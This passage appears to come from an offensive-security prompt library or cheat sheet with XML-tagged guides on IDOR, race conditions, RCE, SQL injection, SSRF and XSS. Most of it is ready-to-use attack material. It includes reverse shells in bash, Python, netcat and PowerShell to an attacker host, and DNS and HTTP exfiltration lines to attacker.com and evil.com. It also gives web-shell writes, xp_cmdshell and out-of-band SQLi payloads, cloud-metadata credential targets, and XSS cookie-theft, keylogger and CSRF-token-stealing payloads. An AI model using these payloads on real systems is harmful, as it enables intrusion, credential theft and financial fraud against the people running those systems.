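The enumeration loop above can be fleshed out into a runnable sketch. The `fetch` callable, the "access denied" baseline heuristic, and the 32-byte body-length threshold are illustrative assumptions, not fixed rules:

```python
# Hypothetical IDOR enumeration sketch: probe an ID range through a
# caller-supplied fetch function and flag responses that differ from an
# "access denied" baseline. The 32-byte length cutoff is an arbitrary
# demo threshold.
def enumerate_idor(fetch, id_range, baseline_id):
    """fetch(object_id) -> (status_code, body_text)."""
    base_status, base_body = fetch(baseline_id)
    hits = []
    for object_id in id_range:
        status, body = fetch(object_id)
        # A different status, or a markedly different body size,
        # suggests the object was served without an authorization check.
        if status != base_status or abs(len(body) - len(base_body)) > 32:
            hits.append(object_id)
    return hits
```

In practice `fetch` would wrap the authenticated HTTP client of the session under test, throttled to stay inside scope.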
<type_confusion>
- String where int expected: "123" vs 123
- Array where single value expected: [123] vs 123
- Object injection: {"id": {"$ne": null}}
</type_confusion>
</exploitation_techniques>
<advanced_techniques>
<uuid_prediction>
- Time-based UUIDs (version 1): predictable timestamps
- Weak randomness in version 4
- Sequential UUID generation
</uuid_prediction>
<blind_idor>
- Side channel: response time, size differences
- Error message variations
- Boolean-based: exists vs not exists
</blind_idor>
<secondary_idor>
First get list of IDs, then access:
/api/users → [123, 456, 789]
/api/user/789/private-data
</secondary_idor>
</advanced_techniques>
<bypass_techniques>
<parameter_pollution>
?id=123&id=456 (takes last or first?)
?user_id=victim&user_id=attacker
</parameter_pollution>
<encoding_tricks>
- URL encode: %31%32%33
- Double encoding: %25%33%31
- Unicode: \u0031\u0032\u0033
</encoding_tricks>
<case_variation>
userId vs userid vs USERID vs UserId
</case_variation>
<format_switching>
/api/user.json?id=123
/api/user.xml?id=123
/api/user/123.json vs /api/user/123
</format_switching>
</bypass_techniques>
<special_contexts>
<graphql_idor>
Query batching and alias abuse:
query { u1: user(id: 123) { data } u2: user(id: 456) { data } }
</graphql_idor>
<websocket_idor>
Subscribe to other users' channels:
{"subscribe": "user_456_notifications"}
</websocket_idor>
<file_path_idor>
../../../other_user/private.pdf
/files/user_123/../../user_456/data.csv
</file_path_idor>
</special_contexts>
<chaining_attacks>
- IDOR + XSS: Access and weaponize other users' data
- IDOR + CSRF: Force actions on discovered objects
- IDOR + SQLi: Extract all IDs then access
</chaining_attacks>
<validation>
To confirm IDOR:
1. Access data/function without authorization
2. Demonstrate data belongs to another user
3. Show consistent access pattern
4. Prove it's not intended functionality
5. Document security impact
</validation>
<false_positives>
NOT IDOR if:
- Public data by design
- Proper authorization checks
- Only affects own resources
- Rate limiting prevents exploitation
- Data is sanitized/limited
</false_positives>
<impact>
- Personal data exposure
- Financial information theft
- Account takeover
- Business data leak
- Compliance violations (GDPR, HIPAA)
</impact>
<pro_tips>
1. Test all ID parameters systematically
2. Look for patterns in IDs
3. Check export/download functions
4. Test different HTTP methods
5. Monitor for blind IDOR via timing
6. Check mobile APIs separately
7. Look for backup/debug endpoints
8. Test file path traversal
9. Automate enumeration carefully
10. Chain with other vulnerabilities
</pro_tips>
<remember>IDORs are about broken access control, not just guessable IDs. Even GUIDs can be vulnerable if disclosed elsewhere. Focus on high-impact data access.</remember>
</idor_vulnerability_guide>

<race_conditions_guide>
<title>RACE CONDITIONS - TIME-OF-CHECK TIME-OF-USE (TOCTOU) MASTERY</title>
<critical>Race conditions lead to financial fraud, privilege escalation, and business logic bypass. Often overlooked but devastating.</critical>
<high_value_targets>
- Payment/checkout processes
- Coupon/discount redemption
- Account balance operations
- Voting/rating systems
- Limited resource allocation
- User registration (username claims)
- Password reset flows
- File upload/processing
- API rate limits
- Loyalty points/rewards
- Stock/inventory management
- Withdrawal functions
</high_value_targets>
<discovery_techniques>
<identify_race_windows>
Multi-step processes with gaps between:
1. Check phase (validation/verification)
2. Use phase (action execution)
3. Write phase (state update)
Look for:
- "Check balance then deduct"
- "Verify coupon then apply"
- "Check inventory then purchase"
- "Validate token then consume"
</identify_race_windows>
<detection_methods>
- Parallel requests with same data
- Rapid sequential requests
- Monitor for inconsistent states
- Database transaction analysis
- Response timing variations
</detection_methods>
</discovery_techniques>
<exploitation_tools>
<turbo_intruder>
Python script for Burp Suite Turbo Intruder:
```python
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=30,
requestsPerConnection=100,
pipeline=False)
for i in range(30):
engine.queue(target.req, gate='race1')
engine.openGate('race1')
```
</turbo_intruder>
<manual_methods>
- Browser developer tools (multiple tabs)
- curl with & for background: curl url & curl url &
- Python asyncio/aiohttp
- Go routines
- Node.js Promise.all()
</manual_methods>
</exploitation_tools>
<common_vulnerabilities>
<financial_races>
- Double withdrawal
- Multiple discount applications
- Balance transfer duplication
- Payment bypass
- Cashback multiplication
</financial_races>
<authentication_races>
- Multiple password resets
- Account creation with same email
- 2FA bypass
- Session generation collision
</authentication_races>
<resource_races>
- Inventory depletion bypass
- Rate limit circumvention
- File overwrite
- Token reuse
</resource_races>
</common_vulnerabilities>
<advanced_techniques>
<single_packet_attack>
HTTP/2 multiplexing for true simultaneous delivery:
- All requests in single TCP packet
- Microsecond precision
- Bypass even mutex locks
</single_packet_attack>
<last_byte_sync>
Send all but last byte, then:
1. Hold connections open
2. Send final byte simultaneously
3. Achieve nanosecond precision
</last_byte_sync>
<connection_warming>
Pre-establish connections:
1. Create connection pool
2. Prime with dummy requests
3. Send race requests on warm connections
</connection_warming>
</advanced_techniques>
<bypass_techniques>
<distributed_attacks>
- Multiple source IPs
- Different user sessions
- Varied request headers
- Geographic distribution
</distributed_attacks>
<timing_optimization>
- Measure server processing time
- Align requests with server load
- Exploit maintenance windows
- Target async operations
</timing_optimization>
</bypass_techniques>
<specific_scenarios>
<limit_bypass>
"Limited to 1 per user" → Send N parallel requests
Results: N successful purchases
</limit_bypass>
<balance_manipulation>
Transfer $100 from account with $100 balance:
- 10 parallel transfers
- Each checks balance: $100 available
- All proceed: -$900 balance
</balance_manipulation>
<vote_manipulation>
Single vote limit:
- Send multiple vote requests simultaneously
- All pass validation
- Multiple votes counted
</vote_manipulation>
</specific_scenarios>
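The balance-manipulation scenario above can be reproduced locally with threads; a `Barrier` stands in for the network-level synchronization (single-packet, last-byte) techniques by forcing every check to complete before any write happens:

```python
# Local simulation of the check-then-deduct (TOCTOU) race. Ten "transfer"
# threads each snapshot the balance, all pass the >= check against stale
# state, then all deduct -- draining $1000 from a $100 account.
import threading

balance = 100
lock = threading.Lock()
barrier = threading.Barrier(10)
results = []

def transfer(amount=100):
    global balance
    snapshot = balance          # check phase: reads soon-to-be-stale state
    barrier.wait()              # all checks finish before any write starts
    if snapshot >= amount:      # every thread saw $100 available
        with lock:
            balance -= amount   # use phase: all ten deductions go through
        results.append("ok")

threads = [threading.Thread(target=transfer) for _ in range(10)]
for t in threads:
    t.start()
for t in threads:
    t.join()
# balance is now -900
```

The lock around the write shows that locking the *use* phase alone does not help: the flaw is that the check and the use are not one atomic step.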
<validation>
To confirm race condition:
1. Demonstrate parallel execution success
2. Show single request fails
3. Prove timing dependency
4. Document financial/security impact
5. Achieve consistent reproduction
</validation>
<false_positives>
NOT a race condition if:
- Idempotent operations
- Proper locking mechanisms
- Atomic database operations
- Queue-based processing
- No security impact
</false_positives>
<impact>
- Financial loss (double spending)
- Resource exhaustion
- Data corruption
- Business logic bypass
- Privilege escalation
</impact>
<pro_tips>
1. Use HTTP/2 for better synchronization
2. Automate with Turbo Intruder
3. Test payment flows extensively
4. Monitor database locks
5. Try different concurrency levels
6. Test async operations
7. Look for compensating transactions
8. Check mobile app endpoints
9. Test during high load
10. Document exact timing windows
</pro_tips>
<remember>Modern race conditions require microsecond precision. Focus on financial operations and limited resource allocation. Single-packet attacks are most reliable.</remember>
</race_conditions_guide>

<rce_vulnerability_guide>
<title>REMOTE CODE EXECUTION (RCE) - MASTER EXPLOITATION</title>
<critical>RCE is the holy grail - complete system compromise. Modern RCE requires sophisticated bypass techniques.</critical>
<common_injection_contexts>
- System commands: ping, nslookup, traceroute, whois
- File operations: upload, download, convert, resize
- PDF generators: wkhtmltopdf, phantomjs
- Image processors: ImageMagick, GraphicsMagick
- Media converters: ffmpeg, sox
- Archive handlers: tar, zip, 7z
- Version control: git, svn operations
- LDAP queries
- Database backup/restore
- Email sending functions
</common_injection_contexts>
<detection_methods>
<time_based>
- Linux/Unix: ;sleep 10 # | sleep 10 # `sleep 10` $(sleep 10)
- Windows: & ping -n 10 127.0.0.1 & || ping -n 10 127.0.0.1 ||
- PowerShell: ;Start-Sleep -s 10 #
</time_based>
<dns_oob>
- nslookup $(whoami).attacker.com
- ping $(hostname).attacker.com
- curl http://$(cat /etc/passwd | base64).attacker.com
</dns_oob>
<output_based>
- Direct: ;cat /etc/passwd
- Encoded: ;cat /etc/passwd | base64
- Hex: ;xxd -p /etc/passwd
</output_based>
</detection_methods>
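The time-based probes above reduce to one measurement pattern: compare baseline latency against a payload that should sleep, and flag injection only when the delta clearly exceeds the sleep duration. A minimal sketch, where `request` is any callable that issues the HTTP request with the candidate parameter value (the payload strings and the 0.8 jitter margin are assumptions):

```python
import time

def looks_time_injectable(request, benign="127.0.0.1",
                          payload="127.0.0.1; sleep 5", delay=5.0):
    """request(value) sends the request; return True if the payload delays."""
    start = time.monotonic()
    request(benign)
    baseline = time.monotonic() - start

    start = time.monotonic()
    request(payload)
    delayed = time.monotonic() - start

    # Require most of the sleep to show up so network jitter alone
    # does not produce a false positive.
    return (delayed - baseline) >= delay * 0.8
```

Repeating the measurement a few times before reporting keeps one slow response from counting as confirmation.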
<command_injection_vectors>
<basic_payloads>
; id
| id
|| id
& id
&& id
`id`
$(id)
${IFS}id
</basic_payloads>
<bypass_techniques>
- Space bypass: ${IFS}, $IFS$9, <, %09 (tab)
- Blacklist bypass: w'h'o'a'm'i, w"h"o"a"m"i
- Command substitution: $(a=c;b=at;$a$b /etc/passwd)
- Encoding: echo 'aWQ=' | base64 -d | sh
- Case variation: WhOaMi (Windows)
</bypass_techniques>
</command_injection_vectors>
<language_specific_rce>
<php>
- eval($_GET['cmd'])
- system(), exec(), shell_exec(), passthru()
- preg_replace with /e modifier
- assert() with string input
- unserialize() exploitation
</php>
<python>
- eval(), exec()
- subprocess.call(shell=True)
- os.system()
- pickle deserialization
- yaml.load()
</python>
<java>
- Runtime.getRuntime().exec()
- ProcessBuilder
- ScriptEngine eval
- JNDI injection
- Expression Language injection
</java>
<nodejs>
- eval()
- child_process.exec()
- vm.runInContext()
- require() pollution
</nodejs>
</language_specific_rce>
<advanced_exploitation>
<polyglot_payloads>
Works in multiple contexts:
;id;#' |id| #" |id| #
${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}
</polyglot_payloads>
<blind_rce>
- DNS exfiltration: $(whoami).evil.com
- HTTP callbacks: curl evil.com/$(id)
- Time delays for boolean extraction
- Write to web root: echo '<?php system($_GET["cmd"]); ?>' > /var/www/shell.php
</blind_rce>
<chained_exploitation>
1. Command injection → Write webshell
2. File upload → LFI → RCE
3. XXE → SSRF → internal RCE
4. SQLi → INTO OUTFILE → RCE
</chained_exploitation>
</advanced_exploitation>
<specific_contexts>
<imagemagick>
push graphic-context
viewbox 0 0 640 480
fill 'url(https://evil.com/image.jpg"|id > /tmp/output")'
pop graphic-context
</imagemagick>
<ghostscript>
%!PS
/outfile (%pipe%id) (w) file def
</ghostscript>
<ffmpeg>
#EXTM3U
#EXT-X-TARGETDURATION:1
#EXTINF:1.0,
concat:|file:///etc/passwd
</ffmpeg>
<latex>
\immediate\write18{id > /tmp/pwn}
\input{|"cat /etc/passwd"}
</latex>
</specific_contexts>
<container_escapes>
<docker>
- Privileged containers: mount host filesystem
- Docker.sock exposure
- Kernel exploits
- /proc/self/exe overwrite
</docker>
<kubernetes>
- Service account tokens
- Kubelet API access
- Container breakout to node
</kubernetes>
</container_escapes>
<waf_bypasses>
- Unicode normalization
- Double URL encoding
- Case variation mixing
- Null bytes: %00
- Comments: /**/i/**/d
- Alternative commands: hostname vs uname -n
- Path traversal: /usr/bin/id vs id
</waf_bypasses>
<post_exploitation>
<reverse_shells>
Bash: bash -i >& /dev/tcp/attacker/4444 0>&1
Python: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Netcat: nc -e /bin/sh attacker 4444
PowerShell: $client = New-Object System.Net.Sockets.TCPClient("attacker",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
</reverse_shells>
<persistence>
- Cron jobs
- SSH keys
- Web shells
- Systemd services
</persistence>
</post_exploitation>
<validation>
To confirm RCE:
1. Execute unique command (id, hostname)
2. Demonstrate file system access
3. Show command output retrieval
4. Achieve reverse shell
5. Prove consistent execution
</validation>
<false_positives>
NOT RCE if:
- Only crashes application
- Limited to specific commands
- Sandboxed/containerized properly
- No actual command execution
- Output not retrievable
</false_positives>
<impact>
- Complete system compromise
- Data exfiltration
- Lateral movement
- Backdoor installation
- Service disruption
</impact>
<pro_tips>
1. Try all delimiters: ; | || & &&
2. Test both Unix and Windows commands
3. Use time-based for blind confirmation
4. Chain with other vulnerabilities
5. Check sudo permissions post-exploit
6. Look for SUID binaries
7. Test command substitution variants
8. Monitor DNS for blind RCE
9. Try polyglot payloads first
10. Document full exploitation path
</pro_tips>
<remember>Modern RCE often requires chaining vulnerabilities and bypassing filters. Focus on blind techniques, WAF bypasses, and achieving stable shells. Always test in the specific context - ImageMagick RCE differs from command injection.</remember>
</rce_vulnerability_guide>

<sql_injection_guide>
<title>SQL INJECTION - MASTER CLASS TECHNIQUES</title>
<critical>SQL Injection = direct database access = game over.</critical>
<injection_points>
- URL parameters: ?id=1
- POST body parameters
- HTTP headers: User-Agent, Referer, X-Forwarded-For
- Cookie values
- JSON/XML payloads
- File upload names
- Session identifiers
</injection_points>
<detection_techniques>
- Time-based: ' AND SLEEP(5)--
- Boolean-based: ' AND '1'='1 vs ' AND '1'='2
- Error-based: ' (provoke verbose errors)
- Out-of-band: DNS/HTTP callbacks
- Differential response: content length changes
- Second-order: stored and triggered later
</detection_techniques>
<uncommon_contexts>
- ORDER BY: (CASE WHEN condition THEN 1 ELSE 2 END)
- GROUP BY: GROUP BY id HAVING 1=1--
- INSERT: INSERT INTO users VALUES (1,'admin',(SELECT password FROM admins))--
- UPDATE: UPDATE users SET email=(SELECT @@version) WHERE id=1
- Functions: WHERE MATCH(title) AGAINST((SELECT password FROM users LIMIT 1))
</uncommon_contexts>
<basic_payloads>
<union_based>
' UNION SELECT null--
' UNION SELECT null,null--
' UNION SELECT 1,2,3--
' UNION SELECT 1,@@version,3--
' UNION ALL SELECT 1,database(),3--
</union_based>
<error_based>
' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))--
' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--
' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
</error_based>
<blind_boolean>
' AND SUBSTRING((SELECT password FROM users LIMIT 1),1,1)='a'--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>97--
' AND (SELECT COUNT(*) FROM users)>5--
</blind_boolean>
<blind_time>
' AND IF(1=1,SLEEP(5),0)--
' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--
'; WAITFOR DELAY '0:0:5'-- (MSSQL)
'; SELECT pg_sleep(5)-- (PostgreSQL)
</blind_time>
</basic_payloads>
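The boolean-based blind payloads above can be demonstrated end-to-end against a deliberately vulnerable sqlite3 query. The table, column, and password are made up for the demo, and the charset is restricted so the illustrative payload cannot itself break the query syntax:

```python
import sqlite3
import string

# Demo-only charset (no quote characters).
CHARSET = string.ascii_lowercase + string.digits

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret')")

def vulnerable_lookup(name):
    # Vulnerable on purpose: attacker input concatenated into the SQL.
    row = db.execute(f"SELECT name FROM users WHERE name = '{name}'").fetchone()
    return row is not None                      # boolean oracle: found or not

def extract_password():
    recovered = ""
    while True:
        for ch in CHARSET:
            # Mirrors: ' AND SUBSTRING((SELECT password ...),i,1)='a'--
            payload = (f"admin' AND SUBSTR((SELECT password FROM users"
                       f" LIMIT 1), {len(recovered) + 1}, 1) = '{ch}' --")
            if vulnerable_lookup(payload):
                recovered += ch
                break
        else:
            return recovered                    # no match: string exhausted
```

The attacker never sees the password directly, only the true/false difference in the response, yet recovers it one byte per character-set sweep.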
<advanced_techniques>
<stacked_queries>
'; DROP TABLE users--
'; INSERT INTO admins VALUES ('hacker','password')--
'; UPDATE users SET password='hacked' WHERE username='admin'--
</stacked_queries>
<out_of_band>
MySQL:
' AND LOAD_FILE(CONCAT('\\\\',database(),'.attacker.com\\a'))--
' UNION SELECT LOAD_FILE('/etc/passwd')--
MSSQL:
'; EXEC xp_dirtree '\\attacker.com\share'--
'; EXEC xp_cmdshell 'nslookup attacker.com'--
PostgreSQL:
'; CREATE EXTENSION dblink; SELECT dblink_connect('host=attacker.com')--
</out_of_band>
<file_operations>
MySQL:
' UNION SELECT 1,2,LOAD_FILE('/etc/passwd')--
' UNION SELECT 1,2,'<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
MSSQL:
'; EXEC xp_cmdshell 'type C:\Windows\win.ini'--
PostgreSQL:
'; CREATE TABLE test(data text); COPY test FROM '/etc/passwd'--
</file_operations>
</advanced_techniques>
<filter_bypasses>
<space_bypass>
- Comments: /**/
- Parentheses: UNION(SELECT)
- Backticks: UNION`SELECT`
- Newlines: %0A, %0D
- Tabs: %09
</space_bypass>
<keyword_bypass>
- Case variation: UnIoN SeLeCt
- Comments: UN/**/ION SE/**/LECT
- Encoding: %55nion %53elect
- Double words: UNUNIONION SESELECTLECT
</keyword_bypass>
<waf_bypasses>
- HTTP Parameter Pollution: id=1&id=' UNION SELECT
- JSON/XML format switching
- Chunked encoding
- Unicode normalization
- Scientific notation: 1e0 UNION SELECT
</waf_bypasses>
</filter_bypasses>
<specific_databases>
<mysql>
- Version: @@version
- Database: database()
- User: user(), current_user()
- Tables: information_schema.tables
- Columns: information_schema.columns
</mysql>
<mssql>
- Version: @@version
- Database: db_name()
- User: user_name(), system_user
- Tables: sysobjects WHERE xtype='U'
- Enable xp_cmdshell: sp_configure 'xp_cmdshell',1;RECONFIGURE
</mssql>
<postgresql>
- Version: version()
- Database: current_database()
- User: current_user
- Tables: pg_tables
- Command execution: CREATE EXTENSION
</postgresql>
<oracle>
- Version: SELECT banner FROM v$version
- Database: SELECT ora_database_name FROM dual
- User: SELECT user FROM dual
- Tables: all_tables
</oracle>
</specific_databases>
<nosql_injection>
<mongodb>
{"username": {"$ne": null}, "password": {"$ne": null}}
{"$where": "this.username == 'admin'"}
{"username": {"$regex": "^admin"}}
</mongodb>
<graphql>
{users(where:{OR:[{id:1},{id:2}]}){id,password}}
{__schema{types{name,fields{name}}}}
</graphql>
</nosql_injection>
<automation>
SQLMap flags:
- Risk/Level: --risk=3 --level=5
- Bypass WAF: --tamper=space2comment,between
- OS Shell: --os-shell
- Database dump: --dump-all
- Specific technique: --technique=T (time-based)
</automation>
<validation>
To confirm SQL injection:
1. Demonstrate database version extraction
2. Show database/table enumeration
3. Extract actual data
4. Prove query manipulation
5. Document consistent exploitation
</validation>
<false_positives>
NOT SQLi if:
- Only generic errors
- No time delays work
- Same response for all payloads
- Parameterized queries properly used
- Input validation effective
</false_positives>
<impact>
- Database content theft
- Authentication bypass
- Data manipulation
- Command execution (xp_cmdshell)
- File system access
- Complete database takeover
</impact>
<pro_tips>
1. Always try UNION SELECT first
2. Use sqlmap for automation
3. Test all HTTP headers
4. Try different encodings
5. Check for second-order SQLi
6. Test JSON/XML parameters
7. Look for error messages
8. Try time-based for blind
9. Check INSERT/UPDATE contexts
10. Focus on data extraction
</pro_tips>
<remember>Modern SQLi requires bypassing WAFs and dealing with complex queries. Focus on extracting sensitive data - passwords, API keys, PII. Time-based blind SQLi works when nothing else does.</remember>
</sql_injection_guide>

<ssrf_vulnerability_guide>
<title>SERVER-SIDE REQUEST FORGERY (SSRF) - ADVANCED EXPLOITATION</title>
<critical>SSRF can lead to internal network access, cloud metadata theft, and complete infrastructure compromise.</critical>
<common_injection_points>
- URL parameters: url=, link=, path=, src=, href=, uri=
- File import/export features
- Webhooks and callbacks
- PDF generators (wkhtmltopdf)
- Image processing (ImageMagick)
- Document parsers
- Payment gateways (IPN callbacks)
- Social media card generators
- URL shorteners/expanders
</common_injection_points>
<hidden_contexts>
- Referer headers in analytics
- Link preview generation
- RSS/Feed fetchers
- Repository cloning (Git/SVN)
- Package managers (npm, pip)
- Calendar invites (ICS files)
- OAuth redirect_uri
- SAML endpoints
- GraphQL field resolvers
</hidden_contexts>
<cloud_metadata>
<aws>
Legacy: http://169.254.169.254/latest/meta-data/
IMDSv2: Requires token but check if app proxies headers
Key targets: /iam/security-credentials/, /user-data/
</aws>
<google_cloud>
http://metadata.google.internal/computeMetadata/v1/
Requires: Metadata-Flavor: Google header
Target: /instance/service-accounts/default/token
</google_cloud>
<azure>
http://169.254.169.254/metadata/instance?api-version=2021-02-01
Requires: Metadata: true header
OAuth: /metadata/identity/oauth2/token
</azure>
</cloud_metadata>
<internal_services>
<port_scanning>
Common ports: 21,22,80,443,445,1433,3306,3389,5432,6379,8080,9200,27017
</port_scanning>
<service_fingerprinting>
- Elasticsearch: http://localhost:9200/_cat/indices
- Redis: dict://localhost:6379/INFO
- MongoDB: http://localhost:27017/test
- Docker: http://localhost:2375/v1.24/containers/json
- Kubernetes: https://kubernetes.default.svc/api/v1/
</service_fingerprinting>
</internal_services>
<protocol_exploitation>
<gopher>
Redis RCE, SMTP injection, FastCGI exploitation
</gopher>
<file>
file:///etc/passwd, file:///proc/self/environ
</file>
<dict>
dict://localhost:11211/stat (Memcached)
</dict>
</protocol_exploitation>
<bypass_techniques>
<dns_rebinding>
First request → your server, second → 127.0.0.1
</dns_rebinding>
<encoding_tricks>
- Decimal IP: http://2130706433/ (127.0.0.1)
- Octal: http://0177.0.0.1/
- Hex: http://0x7f.0x0.0x0.0x1/
- IPv6: http://[::1]/, http://[::ffff:127.0.0.1]/
</encoding_tricks>
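The alternate IP notations above can be generated mechanically; filters that blacklist the literal string "127.0.0.1" often accept these equivalent forms, which resolvers map to the same address:

```python
# Generate the decimal, octal, hex, and IPv6-mapped spellings of an IPv4
# address for filter-bypass testing.
def ip_notations(ip):
    octets = [int(o) for o in ip.split(".")]
    as_int = (octets[0] << 24) | (octets[1] << 16) | (octets[2] << 8) | octets[3]
    return {
        "decimal": f"http://{as_int}/",
        "octal":   "http://" + ".".join(f"0{o:o}" for o in octets) + "/",
        "hex":     "http://" + ".".join(f"0x{o:x}" for o in octets) + "/",
        "ipv6_mapped": f"http://[::ffff:{ip}]/",
    }
```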
<url_parser_confusion>
- Authority: http://expected@evil/
- Unicode: http://⑯⑨。②⑤④。⑯⑨。②⑤④/
</url_parser_confusion>
<redirect_chains>
302 → yourserver.com → 169.254.169.254
</redirect_chains>
</bypass_techniques>
<advanced_techniques>
<blind_ssrf>
- DNS exfiltration: http://$(hostname).attacker.com/
- Timing attacks for network mapping
- Error-based detection
</blind_ssrf>
<ssrf_to_rce>
- Redis: gopher://localhost:6379/ (cron injection)
- Memcached: gopher://localhost:11211/
- FastCGI: gopher://localhost:9000/
</ssrf_to_rce>
</advanced_techniques>
<filter_bypasses>
<localhost>
127.1, 0177.0.0.1, 0x7f000001, 2130706433, 127.0.0.0/8, localtest.me
</localhost>
<parser_differentials>
http://evil.com#@good.com/, http:evil.com
</parser_differentials>
<protocols>
dict://, gopher://, ftp://, file://, jar://, netdoc://
</protocols>
</filter_bypasses>
<validation_techniques>
To confirm SSRF:
1. External callbacks (DNS/HTTP)
2. Internal network access (different responses)
3. Time-based detection (timeouts)
4. Cloud metadata retrieval
5. Protocol differentiation
</validation_techniques>
<false_positive_indicators>
NOT SSRF if:
- Only client-side redirects
- Whitelist properly blocking
- Generic errors for all URLs
- No outbound requests made
- Same-origin policy enforced
</false_positive_indicators>
<impact_demonstration>
- Cloud credential theft (AWS/GCP/Azure)
- Internal admin panel access
- Port scanning results
- SSRF to RCE chain
- Data exfiltration
</impact_demonstration>
<pro_tips>
1. Always check cloud metadata first
2. Chain with other vulns (SSRF + XXE)
3. Use time delays for blind SSRF
4. Try all protocols, not just HTTP
5. Automate internal network scanning
6. Check parser quirks (language-specific)
7. Monitor DNS for blind confirmation
8. Try IPv6 (often forgotten)
9. Abuse redirects for filter bypass
10. SSRF can be in any URL-fetching feature
</pro_tips>
<remember>SSRF is often the key to cloud compromise. A single SSRF in cloud = complete account takeover through metadata access.</remember>
</ssrf_vulnerability_guide>

<xss_vulnerability_guide>
<title>CROSS-SITE SCRIPTING (XSS) - ADVANCED EXPLOITATION</title>
<critical>XSS leads to account takeover, data theft, and complete client-side compromise. Modern XSS requires sophisticated bypass techniques.</critical>
<injection_points>
- URL parameters: ?search=, ?q=, ?name=
- Form inputs: text, textarea, hidden fields
- Headers: User-Agent, Referer, X-Forwarded-For
- Cookies (if reflected)
- File uploads (filename, metadata)
- JSON endpoints: {"user":"<payload>"}
- postMessage handlers
- DOM properties: location.hash, document.referrer
- WebSocket messages
- PDF/document generators
</injection_points>
<basic_detection>
<reflection_testing>
Simple: <random123>
HTML: <h1>test</h1>
Script: <script>alert(1)</script>
Event: <img src=x onerror=alert(1)>
Protocol: javascript:alert(1)
</reflection_testing>
<encoding_contexts>
- HTML: <>&"'
- Attribute: "'<>&
- JavaScript: "'\/\n\r\t
- URL: %3C%3E%22%27
- CSS: ()'";{}
</encoding_contexts>
</basic_detection>
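The reflection-testing and encoding-context steps above can be wrapped in a small probe helper. The `send` callable and the four result labels are illustrative assumptions:

```python
import secrets

def probe_reflection(send):
    """send(payload) -> response body. Classify how the payload reflects."""
    # Unique marker so a hit in the body cannot be a coincidence.
    marker = "x" + secrets.token_hex(4)
    body = send(f"<{marker}>")
    if f"<{marker}>" in body:
        return "unencoded"      # raw <> survive: try <script>/<img> payloads
    if f"&lt;{marker}&gt;" in body:
        return "html-encoded"   # brackets escaped: pivot to attribute/JS contexts
    if marker in body:
        return "partial"        # marker reflected but brackets stripped/altered
    return "not-reflected"
```

Running the probe once per injection point quickly narrows which encoding-context payloads from the lists above are worth trying.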
<filter_bypasses>
<tag_event_bypasses>
<svg onload=alert(1)>
<body onpageshow=alert(1)>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<audio src onloadstart=alert(1)>
<video><source onerror=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus>/*</textarea><svg/onload=alert(1)>
<keygen autofocus onfocus=alert(1)>
<frameset onload=alert(1)>
</tag_event_bypasses>
<string_bypass>
- Concatenation: 'al'+'ert'
- Comments: /**/alert/**/
- Template literals: `ale${`rt`}`
- Unicode: \u0061lert
- Hex: \x61lert
- Octal: \141lert
- HTML entities: &apos;alert&apos;
- Double encoding: %253Cscript%253E
- Case variation: <ScRiPt>
</string_bypass>
<parentheses_bypass>
alert`1`
setTimeout`alert\x281\x29`
[].map.call`1${alert}2`
onerror=alert;throw 1
throw onerror=alert,1
onerror=alert(1)//
</parentheses_bypass>
<keyword_bypass>
- Proxy: window['al'+'ert']
- Base64: atob('YWxlcnQ=')
- Hex: eval('\x61\x6c\x65\x72\x74')
- Constructor: [].constructor.constructor('alert(1)')()
- JSFuck: [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]...
</keyword_bypass>
</filter_bypasses>
<advanced_techniques>
<dom_xss>
- Sinks: innerHTML, document.write, eval, setTimeout
- Sources: location.hash, location.search, document.referrer
- Example: element.innerHTML = location.hash
- Exploit: #<img src=x onerror=alert(1)>
</dom_xss>
<mutation_xss>
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<form><button formaction=javascript:alert(1)>
</mutation_xss>
<polyglot_xss>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
</polyglot_xss>
<csp_bypasses>
- JSONP endpoints: <script src="//site.com/jsonp?callback=alert">
- AngularJS: {{constructor.constructor('alert(1)')()}}
- Script gadgets in allowed libraries
- Base tag injection: <base href="//evil.com/">
- Object/embed: <object data="data:text/html,<script>alert(1)</script>">
</csp_bypasses>
</advanced_techniques>
<exploitation_payloads>
<cookie_theft>
<script>fetch('//evil.com/steal?c='+document.cookie)</script>
<img src=x onerror="this.src='//evil.com/steal?c='+document.cookie">
new Image().src='//evil.com/steal?c='+document.cookie
</cookie_theft>
<keylogger>
document.onkeypress=e=>fetch('//evil.com/key?k='+e.key)
</keylogger>
<phishing>
document.body.innerHTML='<form action=//evil.com/phish><input name=pass><input type=submit></form>'
</phishing>
<csrf_token_theft>
fetch('/api/user').then(r=>r.text()).then(d=>fetch('//evil.com/token?t='+d.match(/csrf_token":"([^"]+)/)[1]))
</csrf_token_theft>
<webcam_mic_access>
navigator.mediaDevices.getUserMedia({video:true}).then(s=>...)
</webcam_mic_access>
</exploitation_payloads>
<special_contexts>
<pdf_generation>
